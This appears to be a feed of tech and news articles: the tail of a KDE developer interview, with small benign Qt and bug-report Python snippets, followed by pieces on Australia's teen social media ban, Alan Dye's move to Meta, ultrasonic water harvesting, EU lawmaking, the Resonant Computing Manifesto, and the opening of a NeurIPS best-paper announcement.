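For readers who haven't used Qt, here is a tiny sketch of the two features mentioned, signals/slots and parent ownership, using the PySide6 Python bindings rather than the C++ discussed in the interview; the Counter class is a made-up example.

    # pip install PySide6
    from PySide6.QtCore import QObject, Signal

    class Counter(QObject):
        value_changed = Signal(int)  # declare a signal carrying an int

        def __init__(self, parent=None):
            super().__init__(parent)  # the parent takes ownership of this object
            self._value = 0

        def increment(self):
            self._value += 1
            self.value_changed.emit(self._value)  # notify all connected slots

    root = QObject()
    counter = Counter(parent=root)         # root now owns counter
    counter.value_changed.connect(print)   # any callable can act as a slot
    counter.increment()                    # prints: 1
    # when root is destroyed, Qt tears down counter along with it

The same pattern in C++ uses QObject::connect and the Q_OBJECT macro; the mechanics of parent-child cleanup are identical.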

I'm still learning and don't have much in-depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense; it should be autogenerated as part of the compilation. I found some such header-generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.

What are your thoughts on Linux overall: big things which need changing but no one is working on, nice initiatives which you think will improve things, etc.?

The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEMs start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people have moved over. Just a few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.

Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance, immutable systems are very nice: they allow users to jump from a broken state back to a working state with ease (by selecting a different boot entry at startup).

Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: make it easy to install, test, run, etc. If Linux desktops can get more hardware manufacturers on board to install a Linux desktop as the default, that will certainly help too. Also, shoutout to the EndOf10 ( https://endof10.org/ ) initiative; when I shared it around to my non-nerdy friends, they were very curious about the Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels. We need to stop fighting about "what's the best desktop" and work together more.

BTW, if anyone reading this has been Linux-curious, go for it! Take a secondary device and play around with it there. And don't be afraid to contribute to things you like in any way you can, be it software, hardware or the actual physical world.

How do you see it in light of more phone usage and less desktop usage? Do you have any impressions of governments or businesses moving to Linux?

Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be a top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.

Phones are the king of "basic stuff", and for many people a tablet functions as a simple internet appliance. I can only hope that projects like postmarketOS ( https://postmarketos.org/ ) will help to keep these tablets and phones working when the regular Android updates stop, to ease the avalanche of e-waste.

When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I don't know, but I would like to push more for it. It's certainly an area where we should try to help as much as possible.

How can we (individuals or organizations) help?

Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter; just say it's something you use, and elaborate when people ask. Too many times I've seen people pushed away from using the Linux desktop because people are very... pushy. As surprising as it may be, not many people care as much as we do!

Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small. It does not need to be an overnight change, just small things here and there.

How many resources do you have compared to the demands of everything you are working on?

We're definitely stretched. We could always use more help, though C++ seems to deter that help a bit, which I can understand. But if I could learn it from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.

What prerequisites are there for contributing?

We have a Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute). All of it is documented. When triaging, I try more often to tag bugs in Bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy, so we hope people put some effort into trying to learn things too, of course.

How could bug reporting be improved?

I think we could half-automate bug reports to make things easier: gather basic information and ask basic questions upfront, without needing to open a web browser. For crash reports, we use a tool called DrKonqi: when an app crashes, it gathers backtraces etc. automagically and allows the user to type what happened in a field. Something similar for regular ol' bugs would be great. Games do this by taking screenshots and logs when the player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: go through some bug reports, see if you can reproduce them or not, and report back with your system information. Anyone can do it; it's not a difficult job, just a bit tedious, especially when there are thousands of bug reports and 10 people going through them.
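
As an illustration of the "gather basic information upfront" idea, here is a made-up sketch (not how DrKonqi works internally) that collects environment details so the reporter only has to describe the problem:

    # sketch: collect basic system info for a bug report (illustrative)
    import platform, subprocess

    def bug_report_stub(description: str) -> str:
        info = {
            "OS": platform.platform(),
            "Python": platform.python_version(),
            "Machine": platform.machine(),
        }
        try:  # KDE-specific detail, if the binary is present
            info["Plasma"] = subprocess.check_output(
                ["plasmashell", "--version"], text=True).strip()
        except (OSError, subprocess.CalledProcessError):
            pass
        system = "\n".join(f"{k}: {v}" for k, v in info.items())
        return f"WHAT HAPPENED:\n{description}\n\nSYSTEM:\n{system}"

    print(bug_report_stub("Panel crashes when I change the wallpaper."))

A reporter still writes the description, but the tedious environment details come along for free.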

How do you approach problem solving?

Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at the same time:

  • Sometimes I try to fix the bug to figure it out: Why does a given change fix the bug? The fix may not be the correct fix yet.
  • Of course, a well written bugreport with good reproduction steps helps a lot!
  • git blame is a good friend, and asking the people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s.
  • Talking to other people
  • Writing notes down as you try to understand the bug

Anything that pokes your brain in multiple different directions.

I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?

Sometimes the code just "feels right", or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.

What inspires you to have an online presence (on IRC, commenting, blog posts etc.)? How do you decide when to make a blog post or not?

For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.

I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee breaks and office chitchat, so I hang about on IRC, Matrix, the Fediverse, Lobsters etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind a hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.

After learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web browser and do something else. The hardest part is actually noticing it.

Do you have any interesting personal tools? I use your colorscheme.

I journal a lot on a reMarkable 2 tablet when working, writing down what I have done, what I should do, or notes while figuring out problems. Writing by hand helps me remember things too. I made an RSS "newspaper" script for my tablet, which also shows the daily weather now.

I also use todo.txt for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called KomoDo.
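
For those unfamiliar, todo.txt is a plain-text format where each task is one line and priorities, projects and contexts are simple markers. A few hypothetical lines in that style (the tasks themselves are invented for illustration):

    (A) 2025-12-05 Triage crash in wallpaper dialog +KDE @work
    (B) Finish level design +ArtificialRage @home
    x 2025-12-01 Release KomoDo bugfix +KomoDo

The "(A)" is a priority, "+word" tags a project, "@word" a context, and a leading "x" marks a task as done; because it's just text, any editor or script can work with it.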

Then I use Obsidian for any technical notes and know-how, like programming and computer things that are a pain to write by hand.

When did you migrate to Codeberg?

It was even before GitHub started getting "AI" stuff. I just got tired of GitHub being a social media site instead of a good platform. SourceHut would have been nice too; I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.

Teens hoping to get around Australia’s social media ban are rushing to smaller apps. Where are they going?

Guardian
www.theguardian.com
2025-12-05 02:11:23
As Meta begins deleting accounts and the deadline looms, children have already begun to flock to platforms not included in the banned list, like Coverstar, Lemon8, Yope and Rednote.
Original Article

As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.

One teenaged TikTok influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”

From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.

Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.

Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.

The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.

“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.

“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”

Here’s what we know about some of the apps where children are migrating.

Coverstar

The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.

A screenshot from Yope. The Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission. Photograph: Yope

The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.

Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.

Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.

Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.

“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.

AI has been widely used in social media moderation for years; however, Beckett says it has significant limitations.

“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”

Coverstar has been contacted for comment.

Lemon8

Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.

Users can connect a TikTok account, allowing them to seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.

However, on Tuesday Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.

Yope

With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.

Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.

As with Lemon8, Australia’s eSafety commissioner said she had written to Yope advising it to self-assess. Ismailau told the Guardian he had not received any correspondence, but said he was “ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms”.

He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.

“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”

Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.

A mobile phone number is required to create an account.

Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.

Rednote

Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.

Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.

“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”

However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.

Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.

“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”

Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.

“They’re going to get around it,” Beckett said. “They’ll figure it out.”

★ Alan Dye Was in Tim Cook’s Blind Spot

Daring Fireball
daringfireball.net
2025-12-05 01:53:12
How could someone who would even *consider* leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?...
Original Article

NBC News, back in March 2018:

Speaking at a town hall event hosted by MSNBC’s Chris Hayes and Recode’s Kara Swisher, Cook said Facebook put profits above all else when it allegedly allowed user data to be taken through connected apps. [...]

When asked what he would do if he were in Zuckerberg’s position, Cook replied: “What would I do? I wouldn’t be in this situation.”

“The truth is we could make a ton of money if we monetized our customer, if our customer was our product,” Cook said. “We’ve elected not to do that.”

“Privacy to us is a human right. It’s a civil liberty, and something that is unique to America. This is like freedom of speech and freedom of the press,” Cook said. “Privacy is right up there with that for us.”

Perhaps Cook now needs to define “us”.

This was a rather memorable interview. Cook’s “What would I do? I wouldn’t be in this situation” is one of the stone-coldest lines he’s ever zinged at a rival company. (In public, that is.) That was just ice cold. Cook is a consummate diplomat. Most non-founder big company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy — none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception, multiple times, when it comes to Facebook/Meta (and to a lesser degree, Google).

So it’s not just that Alan Dye jumped ship from Apple for the chief design officer role at another company. 1 It’s not just that he left for a rival company. It’s that he left Apple for Meta, of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple. The stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but for the one rival that Cook and the rest of Apple’s senior leadership team consider the most antithetical to Apple’s ideals.

It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he’d left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for Meta, of all companies, feels shocking. How could someone who would even consider leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?

So it’s not just that Alan Dye is a fraud of a UI designer and leader, and that Apple’s senior leadership had a blind spot to the ways Dye’s leadership was steering Apple’s interface design deeply astray. That’s problem enough, as I emphasized in my piece yesterday. It’s also that it’s now clear that Dye’s moral compass was not aligned with Apple’s either. Tim Cook and the rest — or at least most? — of Apple’s senior leadership apparently couldn’t see that, either.

Ultrasonic device dramatically speeds harvesting of water from the air

Hacker News
news.mit.edu
2025-12-05 01:47:45
Comments...
Original Article

Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”

But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.

Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.

The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.

Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.

“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”

Boriskina and her colleagues report on their new device in a study appearing today in the journal Nature Communications. The study’s first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences; co-authors include Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.

Precious hours

Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.

Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.

“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”

She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.

“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.

Water dance

Ultrasound, or ultrasonic waves, are acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.

“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”

Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.

They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.

The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.

“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions that a practical household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.

“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”

This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.

This work was carried out in part by using MIT.nano and ISN facilities at MIT.

Brussels writes so many laws

Hacker News
www.siliconcontinent.com
2025-12-05 01:39:24
Comments...
Original Article

The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions. 1

Not only is the coalition broad, it also encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle: a qualified majority of member states and of members of parliament must support it. The system should produce gridlock, even more than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, and not for exercising their vetoes.

Understanding the incentives

The Commission initiates legislation, but it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike national civil servants and politicians, civil servants and politicians who work in Brussels have one main path to build a career: passing legislation.

Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.

The formal legislative process was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.

This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.

The trilogues became the solution after a formal “declaration” in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a “four-column document.” The first three columns list the starting positions of each institution, the fourth column contains the emerging law. The Commission acts as the “pen-holder” for this fourth column. This gives them immense power: by controlling the wording of the compromise, they can subtly exclude options they dislike.

Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted nearly 38 hours . This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all. 2

Final agreement of the trilogue for the Recovery and Resilience Facility (Regulation (EU) 2021/241), in the early morning hours of December 18, 2020. Left to right: Garicano (Renew), Boeslager (Greens), Van Overtveldt (ECR), Muresan (EPP), Clauss (German Council Presidency), Dombrovskis (EU Commission), Tinagli (S&D), García (S&D), Pislaru (Renew).

The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.

The committee coordinator for each political group appoints one MEP to handle the legislative file: the Rapporteur for the lead group, Shadow Rapporteurs for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.

When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.

Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”

Groups face pressure for a simple up-or-down vote, and often prefer claiming a deal to doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.

Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.

The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee approved (by just 6 votes) a mandate to cut CO₂ emissions from new cars by 100% by 2035. De facto, this bans new petrol and diesel cars from that date.

Less than four weeks later, in June 2022, Parliament rubber-stamped that position as its official negotiating mandate, with a “Ferrari” exception for niche sports cars. Those four weeks left almost no time to debate, consult national delegations, or reconsider the committee’s position. From that slim committee vote, the EU proceeded toward a historic continent-wide shift to electric vehicles.

Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.

The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law that the Court of Justice, in November 2025, ruled partially illegal, precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.

The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.

The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.

The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over. 3 As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.

As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments. 4

COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.

Quantity without quality

The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the Draghi report looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.

Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis. No single methodology assesses EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.

Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every relevant player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.

By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.

This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.

The Resonant Computing Manifesto

Simon Willison
simonwillison.net
2025-12-05 01:19:26
The Resonant Computing Manifesto Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software. This part in particular resonates with me: For decades, technolo...
Original Article

The Resonant Computing Manifesto . Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.

This part in particular resonates with me:

For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.

This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations.

There are echoes here of the Malleable software concept from Ink & Switch.

The manifesto proposes five principles for building resonant software: Keeping data private and under personal stewardship, building software that's dedicated to the user's interests, ensuring plural and distributed control rather than platform monopolies, making tools adaptable to individual context, and designing for prosocial membership of shared spaces.

Steven Levy talked to the manifesto's lead instigator Alex Komoroske and provides some extra flavor in It's Time to Save Silicon Valley From Itself :

By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”

NeurIPS best paper awards 2025

Hacker News
blog.neurips.cc
2025-12-05 01:15:42
Comments...
Original Article

The Best Paper Award Committee members were nominated by the Program Chairs and the Database and Benchmark track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and Next Generation and Accessibility Chairs.

The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmark Track of the conference.

With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runners-up. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.

The winners are presented here in alphabetical order by title.

Artificial Hivemind: The Open-Ended Homogeneity of Language Models (and Beyond)

Liwei Jiang, Yuanjun Chai, Margaret Li, Mickel Liu, Raymond Fok, Nouha Dziri, Yulia Tsvetkov, Maarten Sap, Yejin Choi

Abstract

